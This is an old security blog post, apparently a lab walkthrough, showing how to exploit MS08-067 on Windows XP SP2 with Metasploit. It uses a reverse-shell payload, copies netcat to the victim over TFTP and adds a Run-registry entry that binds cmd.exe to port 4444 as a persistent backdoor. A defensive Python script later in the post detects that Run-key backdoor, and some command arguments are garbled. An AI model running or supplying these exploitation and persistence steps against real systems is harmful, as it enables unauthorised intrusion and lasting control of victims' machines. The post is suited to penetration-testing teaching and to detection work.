Wednesday, December 23, 2009

How to own a Windows XP SP2 system using the MS08-067 vulnerability and run netcat as a backdoor?

Microsoft Security Bulletin MS08-067 – Critical

DISCLAIMER:
Content provided in this blog may only be used for your own educational purposes. Using these techniques outside of your own computer or network is forbidden and strictly illegal. If you use these techniques in an illegal way you will be punished by law. Our articles and blog posts are provided and created for testing internet security and for learning how to help the world build better security, how to close the holes and backdoors, and for any other internet-security-related help and fixes.
The owners of this blog are not responsible for your illegal actions.


Executive Summary:
A remote code execution vulnerability exists in the Server service on Windows systems. The vulnerability is due to the service not properly handling specially crafted RPC requests. In this video we demonstrate how to exploit this vulnerability with the help of Metasploit and install a backdoor on Windows XP SP2 systems.

The generic lab setup for this demonstration is as follows:

Consider the victim machine running Windows XP SP2.
To get its IP address, go to START -> RUN, type ‘cmd’, then type ‘ipconfig’, which displays the IP address (10.10.1.103).

As the attacker’s machine, we use BackTrack 3.
Switching to BackTrack 3

To get the IP address in BackTrack, click the Konsole icon on the taskbar and type ‘ifconfig’ (10.10.1.101).

For this demonstration we will be working in the console mode of Metasploit 3.

Change the present working directory to ‘/pentest/exploits/framework3’.
To run Metasploit, execute ‘./msfconsole’.
The Metasploit welcome screen displays the available exploits, payloads, encoders, etc.

Enter ‘search 067’ to find the ms08_067_netapi exploit module.
Now we need to tell Metasploit to use the ms08_067_netapi module; for this, type:
use windows/smb/ms08_067_netapi
‘show options’ displays the current settings and the settings that still need to be changed.
RHOST is the Remote Host; set RHOST by typing
‘set RHOST >’

The ‘show payloads’ command lists all payloads that are compatible with the selected exploit.
Set the reverse_tcp payload by typing:
set PAYLOAD windows/shell/reverse_tcp

Use the ‘show options’ command again to check which options have been set and which still need to be set.
LHOST is the Local Host; set LHOST by typing
‘set ip>’

The ‘show targets’ command lists all available targets for the selected exploit module.

The ‘exploit’ command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

If everything goes well, you get a shell on the remote system.

Now we will create a backdoor using netcat; for that, start TFTP.

Open a new Konsole (konsole2) and change the present working directory by typing:
‘cd /tmp’
Make a copy of netcat (nc.exe) in the TFTP root directory, which is ‘/tmp’.

To start TFTP, go to
Services -> TFTPD -> Start TFTPD
Transfer nc.exe to the victim’s system by executing
‘tftp -i get nc.exe’ in the victim’s shell.

Now, to make nc.exe (netcat) run at startup on the victim’s machine, type:
‘reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"’

Now netcat will listen on port 4444 even after every restart.
Restart Windows XP.

To check listening and open ports, type:
netstat -an
netcat is listening on port 4444.

To connect back to the victim’s machine, type:
‘telnet 44444’
This again gives you the victim’s shell.
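The Run-key entry and the listening port set up above are exactly the artefacts a defender looks for on a host suspected of this compromise. The following Python script is an added example and not part of the original post: it parses constructed sample output of ‘reg query’ on the Run key and of ‘netstat -an’, flags Run values that hand a socket to a command interpreter (the ‘-e cmd.exe’ pattern), and reports only those whose port is actually open.

```python
import re

# Constructed sample of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
# output from a host where the Run value described in this post was added.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SoundMAX    REG_SZ    C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
    nc    REG_SZ    %systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe
"""

# Constructed sample of `netstat -an` output from the same host.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
"""

# "-e <shell>" hands the socket to a command interpreter: the netcat bind-shell pattern.
BIND_SHELL_RE = re.compile(r"-e\s+(cmd\.exe|cmd|/bin/sh|/bin/bash)\b", re.IGNORECASE)
PORT_RE = re.compile(r"-p\s+(\d{1,5})")

def suspicious_run_entries(reg_output):
    """Return (value_name, command, port) for Run values that bind a shell to a socket."""
    findings = []
    for line in reg_output.splitlines():
        parts = line.strip().split(None, 2)  # value name, type, data
        if len(parts) != 3 or parts[1] != "REG_SZ":
            continue  # key header, blank line or non-string value
        name, _, command = parts
        if BIND_SHELL_RE.search(command):
            port = PORT_RE.search(command)
            findings.append((name, command, int(port.group(1)) if port else None))
    return findings

def listening_ports(netstat_output):
    """Return the set of TCP ports reported as LISTENING by `netstat -an`."""
    ports = set()
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) == 4 and fields[0] == "TCP" and fields[3] == "LISTENING":
            ports.add(int(fields[1].rsplit(":", 1)[1]))
    return ports

def correlate(reg_output, netstat_output):
    """Keep only Run-key shell binds whose port is actually open: an active backdoor."""
    open_ports = listening_ports(netstat_output)
    return [f for f in suspicious_run_entries(reg_output) if f[2] in open_ports]

if __name__ == "__main__":
    for name, command, port in correlate(SAMPLE_REG_QUERY, SAMPLE_NETSTAT):
        print(f"Run value {name!r} spawns a shell on TCP {port}: {command}")
```

On a real host, feed the script the saved output of the two commands; a Run value that matches but whose port is not listening still deserves a look, since the listener may simply not have started yet.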

Conclusion

Undoubtedly MS08-067, which was used by Conficker and many worm variants of its kind, is one of the biggest issues. So in this article we demonstrated how to use Metasploit, work with the MS08-067 exploit, own Windows XP SP2 systems and place netcat as a backdoor on the victim system.
http://www.cycops.co.in
